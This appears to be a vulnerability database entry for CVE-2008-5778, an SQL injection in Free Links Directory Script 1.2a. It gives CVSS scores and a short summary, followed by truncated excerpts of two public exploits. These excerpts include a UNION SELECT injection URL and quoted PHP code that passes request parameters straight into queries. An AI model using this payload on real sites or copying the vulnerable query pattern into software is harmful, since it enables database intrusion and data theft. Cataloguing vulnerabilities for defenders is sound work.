7.5
CVSSv2

CVE-2008-5778

Published: 30/12/2008 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in report.php in Free Links Directory Script (FLDS) 1.2a allows remote malicious users to execute arbitrary SQL commands via the linkid parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

flds script flds 1.2a

Exploits

#Free Links Directory Script (id) SQL Injection Vulnerability #Author: nuclear #site: flds-scriptcom #vuln: localhost/[path]/redirphp?id=-1%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9,10,11/* #vulnerable code: $ida = $_GET['id']; $link = mysql_fetch_array(mysql_query("select * from links where id=$ida")); $idcheck = mysql_n ...
#!/usr/bin/perl -w # # Free Links Directory Script V12a Remote SQL Injection Exploit # written by ka0x <ka0x01[alt+64]gmailcom> # DOM Labs Security Researchers # - wwwdomlabsorg - # # Vuln code (reportphp): # # if($_COOKIE['logged']=="") { # [] // login # else { # $linkida = $_GET['linkid']; # $linkinfo = mysql_fetch_array(m ...